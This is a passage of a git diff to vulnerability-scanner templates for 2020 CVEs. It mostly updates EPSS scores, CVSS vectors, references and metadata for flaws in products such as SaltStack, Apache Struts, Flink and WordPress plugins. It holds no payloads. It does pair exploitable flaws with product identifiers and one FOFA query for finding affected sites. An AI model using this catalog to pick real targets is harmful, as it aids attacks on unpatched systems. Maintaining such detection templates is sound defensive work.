CVE-2020-15500 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58707 + epss-percentile: 0.58865 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 1abcf20231..24de87f29f 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -25,7 +25,7 @@ info: cve-id: CVE-2020-15505 cwe-id: CWE-706 epss-score: 0.97516 - epss-percentile: 0.99983 + epss-percentile: 0.99984 cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index a48859f9d5..88ab1f2210 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 - epss-score: 0.96425 - epss-percentile: 0.99455 + epss-score: 0.96535 + epss-percentile: 0.99514 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 48f94491e5..71d6f418c5 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 - epss-score: 0.96643 - epss-percentile: 0.99539 + epss-score: 0.96659 + epss-percentile: 0.99554 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 932e7922b9..5e593d7980 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.5584 + epss-percentile: 0.56008 cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index 7466a9f84a..0e1b73656e 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 - epss-score: 0.9713 - epss-percentile: 0.99744 + epss-score: 0.9722 + epss-percentile: 0.998 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index c51d794e5f..8a7141a750 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.02994 - epss-percentile: 0.89826 + epss-score: 0.04525 + epss-percentile: 0.91637 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index c050619fc4..f15533fe8a 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97516 - epss-percentile: 0.99984 + epss-score: 0.97467 + epss-percentile: 0.99958 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index fcbf43f445..1ee94844fc 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -15,12 +15,12 @@ info: - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md - https://nvd.nist.gov/vuln/detail/CVE-2020-16952 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L + cvss-score: 8.6 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.40267 - epss-percentile: 0.96914 + epss-score: 0.92144 + epss-percentile: 0.9874 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index db411da39c..7c5ac981f5 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.4106 + epss-percentile: 0.41137 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index da384e2211..29a96b0a4a 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -13,13 +13,14 @@ info: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 - https://nvd.nist.gov/vuln/detail/CVE-2020-17453 - https://twitter.com/JacksonHHax/status/1374681422678519813 + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1132/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-17453 cwe-id: CWE-79 - epss-score: 0.01486 - epss-percentile: 0.85348 + epss-score: 0.00845 + epss-percentile: 0.80281 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 0243dfa10d..c119c7ce63 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17456 cwe-id: CWE-78 epss-score: 0.97022 - epss-percentile: 0.99688 + epss-percentile: 0.99695 cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index d1d234724b..f96c074689 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17463 cwe-id: CWE-89 epss-score: 0.92663 - epss-percentile: 0.9878 + epss-percentile: 0.98812 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 23dd977a5b..a580096f88 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - epss-score: 0.97449 - epss-percentile: 0.99946 + epss-score: 0.97413 + epss-percentile: 0.9992 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index a1b6abd216..6911deb9b5 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - epss-score: 0.96837 - epss-percentile: 0.99612 + epss-score: 0.96502 + epss-percentile: 0.99497 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 959b7f1130..75f0e9dd54 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - epss-score: 0.96064 - epss-percentile: 0.99347 + epss-score: 0.96414 + epss-percentile: 0.99468 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 02f6b05917..2ccca4a63a 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17518 cwe-id: CWE-22,CWE-23 - epss-score: 0.86271 - epss-percentile: 0.98281 + epss-score: 0.86056 + epss-percentile: 0.98301 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 07c755a2d9..6081517bc5 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-17519 cwe-id: CWE-552 epss-score: 0.9717 - epss-percentile: 0.99762 + epss-percentile: 0.99769 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 10893ef7fd..75d7051a9d 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17526 cwe-id: CWE-287 epss-score: 0.08372 - epss-percentile: 0.93748 + epss-percentile: 0.93787 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 5a1c0c6d32..c0eec9912b 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.97007 - epss-percentile: 0.9968 + epss-score: 0.97062 + epss-percentile: 0.99711 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 9dbd4d1836..170db629f1 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00138 - epss-percentile: 0.49122 + epss-percentile: 0.49224 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 93c766d29b..49e698c538 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48414 + epss-percentile: 0.48529 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 387f181d60..f8cf7aa858 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48414 + epss-percentile: 0.48529 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 2287382efa..cea2a30750 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index f5606ddc9d..01d075a612 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19360 cwe-id: CWE-22 epss-score: 0.05104 - epss-percentile: 0.92095 + epss-percentile: 0.92158 cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 45788cf50c..289f3fd3fe 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 - epss-score: 0.52653 - epss-percentile: 0.97275 + epss-score: 0.43119 + epss-percentile: 0.97011 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 34ef5d4184..6b4c1c1002 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41104 + epss-percentile: 0.4118 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 0a8b535ba8..d6f00a6f92 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-1956 cwe-id: CWE-78 epss-score: 0.97414 - epss-percentile: 0.99916 + epss-percentile: 0.99921 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index f51eb1c498..a624b3384f 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-19625 - epss-score: 0.79709 - epss-percentile: 0.97986 + epss-score: 0.78777 + epss-percentile: 0.9798 cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 2129c10239..b4d528fd27 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37736 + epss-percentile: 0.37789 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 68105c02fc..7c7c93a7b5 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-20300 cwe-id: CWE-89 epss-score: 0.16123 - epss-percentile: 0.95444 + epss-percentile: 0.95461 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 78b3720fe2..3deb98d9d3 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-2036 cwe-id: CWE-79 - epss-score: 0.02306 - epss-percentile: 0.88516 + epss-score: 0.03232 + epss-percentile: 0.90244 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 0f735c9b61..8832d2157e 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-2096 cwe-id: CWE-79 epss-score: 0.96965 - epss-percentile: 0.99665 + epss-percentile: 0.99675 cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 3dbe0193b0..e8d0d3f194 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-20982 cwe-id: CWE-79 epss-score: 0.01894 - epss-percentile: 0.87155 + epss-percentile: 0.8721 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 21dcbd05d6..23463d8ac5 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37736 + epss-percentile: 0.37789 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 278e89ac1b..23578e088b 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - epss-score: 0.05392 - epss-percentile: 0.92333 + epss-score: 0.05846 + epss-percentile: 0.92653 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 6b5d43807f..ac2f6102bc 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2103 cwe-id: CWE-200 epss-score: 0.01531 - epss-percentile: 0.85605 + epss-percentile: 0.85676 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index d34a97520f..741d50787b 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-21224 cwe-id: CWE-88 epss-score: 0.0322 - epss-percentile: 0.90159 + epss-percentile: 0.90218 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index bcc50c17a5..f309f62bfb 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - epss-percentile: 0.55233 + epss-percentile: 0.55398 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index f92c8477ab..774852b9c9 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22208 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94982 + epss-score: 0.19578 + epss-percentile: 0.9585 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 3bff301b69..ce814ea4ee 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22209 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94982 + epss-score: 0.19578 + epss-percentile: 0.9585 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 36137fea8f..3c7c49526f 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94982 + epss-score: 0.19578 + epss-percentile: 0.9585 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index df626d3ecb..3106c099c2 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22211 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94982 + epss-score: 0.19578 + epss-percentile: 0.9585 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 6c444d5e7a..a96c6a5456 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-22840 cwe-id: CWE-601 epss-score: 0.01043 - epss-percentile: 0.82244 + epss-percentile: 0.82334 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 81ab239d04..a94bf8e309 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00168 - epss-percentile: 0.53406 + epss-percentile: 0.53505 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index ed1ecda57b..8f733c6a91 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.00132 - epss-percentile: 0.47857 + epss-percentile: 0.47953 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index baee6c1117..952827efb0 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.01785 - epss-percentile: 0.8667 + epss-score: 0.01489 + epss-percentile: 0.85434 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 13249d91df..f1788ce8dd 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37736 + epss-percentile: 0.37789 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 5df1b2e07d..789e70b7ce 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - epss-score: 0.61117 - epss-percentile: 0.97491 + epss-score: 0.5953 + epss-percentile: 0.97461 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index e29321f356..582c6df53e 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -5,33 +5,29 @@ info: author: dwisiswant0 severity: critical description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. - impact: | - An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. - remediation: | - Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. reference: - https://github.com/dwisiswant0/CVE-2020-24148 - https://wordpress.org/plugins/import-xml-feed/#developers - https://nvd.nist.gov/vuln/detail/CVE-2020-24148 - https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md + remediation: | + Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* epss-score: 0.10229 epss-percentile: 0.94371 - cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: mooveagency - product: import_xml_and_rss_feeds - framework: wordpress fofa-query: body="import-xml-feed" + framework: wordpress + max-request: 2 + product: import_xml_and_rss_feeds + vendor: mooveagency tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency -flow: http(1) && http(2) - http: - raw: - | diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 72169167f8..368e698989 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - epss-score: 0.97392 - epss-percentile: 0.99901 + epss-score: 0.97374 + epss-percentile: 0.99893 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 55b15281d5..0f304f945c 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.00976 - epss-percentile: 0.81619 + epss-percentile: 0.81701 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git 